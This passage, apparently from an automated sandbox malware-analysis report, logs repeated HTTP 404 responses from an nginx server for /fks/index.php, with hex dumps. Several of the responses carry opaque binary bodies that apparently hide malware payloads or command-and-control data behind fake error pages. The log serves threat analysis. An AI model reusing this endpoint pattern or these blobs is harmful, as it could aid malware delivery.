ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 01 68 78 48 b1 fb 9e 1a 14 f1 c9 e9 21 0c f3 1a a3 04 28 3c ff 5b d0 e4 d3 a2 7a 4d 8a a4 75 b4 43 01 52 21 6f 40 51 f8 43 eb 40 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 ff 9b a2 ca 71 83 e8 b9 5f 05 24 18 f7 29 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 20 5e cd e8 b1 55 84 3a a6 47 4e 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe d6 11 e1 47 e4 bc 0f 53 e2 57 df 87 b4 87 d1 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 a1 6f c2 75 6e fd 29 2a b9 dd 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 f8 63 6d 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 fa 97 29 6e ac 51 02 8d e6 24 bd 70 7b 3e 3f 43 d2 34 c9 cc bf 20 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 1a 1b 70 30 55 d4 6a 72 f3 79 9b 1d 68 65 1e 20 2c 4e f7 79 22 6a 07 d0 7a 87 76 57 ec fe fd d5 c9 a5 a5 16 b1 ef a0 0f 77 33 40 69 72 55 bb 11 0f e4 4f 38 a1 a2 6d 63 2c 32 02 8b a4 b7 13 15 0e ce 8a 0b 48 04 13 47 4c d7 76 bf b6 94 ec 9f f5 aa b8 26 e6 fe ce 60 20 fa 15 e5 44 55 23 f6 a0 6e 54 f6 04 d0 18 d1 38 33 c8 c9 54 d6 c6 4f 41 27 43 64 c7 46 f0 3c 9d c1 51 b9 72 11 51 c3 f9 e6 7f 22 e9 29 f1 0c 91 a2 85 5e 91 70 a5 62 22 42 c4 45 f6 ab 87 68 0a 76 2b 79 ef 2e ce ad 78 6a 69 6e 75 77 06 c2 f9 35 4f b0 93 43 10 68 3f d2 85 0b f8 fa e3 95 14 a7 81 d1 b9 da 41 61 6a da 44 54 ee e2 1d 4c e3 e5 17 cf 0c ec 0a 7d e1 d0 5b 83 0e f5 e2 fe 83 0f 6a a1 2a 17 d2 2a 44 74 95 84 c3 db c6 64 24 db cb 54 be 8b e4 f7 ab af 89 df 8c e1 b5 2d 3f b9 35 53 46 31 32 ba 7e 15 54 13 0f cf 6a 45 0a 5f 3d d2 ee 75 9b eb b1 76 52 6b 57 4c 93 23 fc fd 61 b8 5a 12 6c 30 34 db 9e e3 c6 e2 bd 0f ce e3 25 05 60 16 f8 0e 21 c5 a4 f1 a3 0b f9 aa b5 38 7c d5 68 63 2c b3 89 fd ec c6 4d 25 b8 1e 88 81 5e f6 aa fb 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0e e1 c7 14 c2 e5 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff 3d d6 e4 d3 44 7a 4d 8a a4 75 b4 cd 7b 0b 21 6f 40 51 f8 43 0b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 a2 97 24 47 7f fe f8 e8 12 7d c7 74 d7 99 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 d5 e7 a3 ca 6a 83 e8 b9 5f 25 25 18 b7 58 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 71 97 a3 a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 45 84 46 2b a2 59 3e 35 26 1f 18 c2 2b fd 11 df 00 0b bd 33 f6 3e 06 7b 72 f6 1d 02 7c 1b 4c bb a3 eb c9 c9 40 f1 28 44 c2 cb e8 b1 55 84 3a a6 dd 4a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 38 ff 48 ed 3b 71 59 de de 0e e1 47 e4 5c 09 53 e2 19 df 87 b4 2f d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 dd 4b 5a 56 44 05 dd b9 74 70 3e 94 63 41 6e c2 75 6e fd 29 2a 8f d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 82 2d 52 68 c8 bd 08 48 f8 ec 76 de 0c d1 79 02 b8 5d 68 3b 0e 30 02 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 4d c9 56 ce 02 10 3e 3f 45 92 38 c9 cc bb bd a5 33 9b 96 df 1a 17 ef da db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 a5 9c 77 70 b8 5f cb b2 8e 62 4a b3 e4 b2 4d 0c a4 09 88 89 09 2b 75 30 50 1c 6b 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 3c 7a 07 30 5e cd 08 38 98 f4 d1 d3 cd 6f 61 17 9a ee eb 0f 64 ff 6b 79 48 47 bb 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 c4 b7 19 79 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0b e1 d7 3f ab 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1a a3 04 13 3c ff 2f e2 e4 d3 c6 7a 4d 8a a4 75 b4 e3 b5 60 21 6f 40 51 f8 43 0b 72 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 03 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 47 2f 90 ca 69 83 e8 b9 5f 45 21 18 ef 4a 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 46 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 2b ff e8 b1 55 84 3a a6 33 7c 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 0d a1 74 32 79 fe c2 72 e1 47 e4 5c 3d 53 e2 31 df 87 b4 cb e3 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c fb fd 6b 7a 76 64 25 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 0f fa ad 1b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 58 d7 5f 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 76 27 21 6e 80 ad 2b 8d e6 24 bd 70 11 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 dc 03 c3 8f ef 7d 8c f7 37 ed 41 34 71 42 e2 9f e0 c6 6f d1 54 f0 97 1e 19 dd cc 83 ec 16 cf ad 18 9b ed a8 25 45 51 8a a1 b7 8b 41 51 d4 56 ae b2 07 18 de 08 dc 86 ab 21 e0 73 d1 0d be df 30 65 85 fc 82 8e 11 bb f7 5d 53 71 1e 5d 46 3d 29 ba 48 3d 20 1e e3 d4 e6 9f 3b 5d fb b9 8a 33 bb 4b b4 6d a3 ff ff 53 76 8e 84 23 56 32 e9 0e 43 47 9e ba db 5a fc b0 64 dc 0b 52 1f de 9c f4 e7 9c 6b 32 0e bb 52 bf 5e 0d 61 4e 12 ac 04 82 2c 54 9b e0 14 13 f2 42 ce 8a ad 1f d6 f5 b2 34 70 81 c5 40 a5 a1 f9 2f 42 13 f8 5a 7a 0f a1 28 bc a9 7c db fd 8d fa ad 8e c2 1c 1a b3 e1 d3 3f 7b a3 c3 16 27 bd 8b 88 81 10 93 ce d7 42 e8 a9 e3 5c 80 d3 e8 43 f9 d7 6f de 6e 9c 83 2e a5 82 60 ee 60 93 48 59 90 3d 24 13 5e 9c 51 58 a8 33 25 5e b9 34 dd 06 44 09 fd db 7f 28 74 39 52 e4 49 46 89 24 6e 0d 37 97 b5 a6 3b f1 00 41 50 71 e3 8f 45 5e 6f ac 6e 43 3e b6 e3 97 6d f1 4c ae d8 f4 a8 72 f8 2f 55 7b 3e 32 0f 43 de 05 eb fc a1 dd 17 5b b3 8e c3 10 a1 68 6e a0 7e a8 5b 18 f7 3f 84 fc ee 63 ec 4e 9f c7 12 7e 0a 1f 6a 8a 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 16:57:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 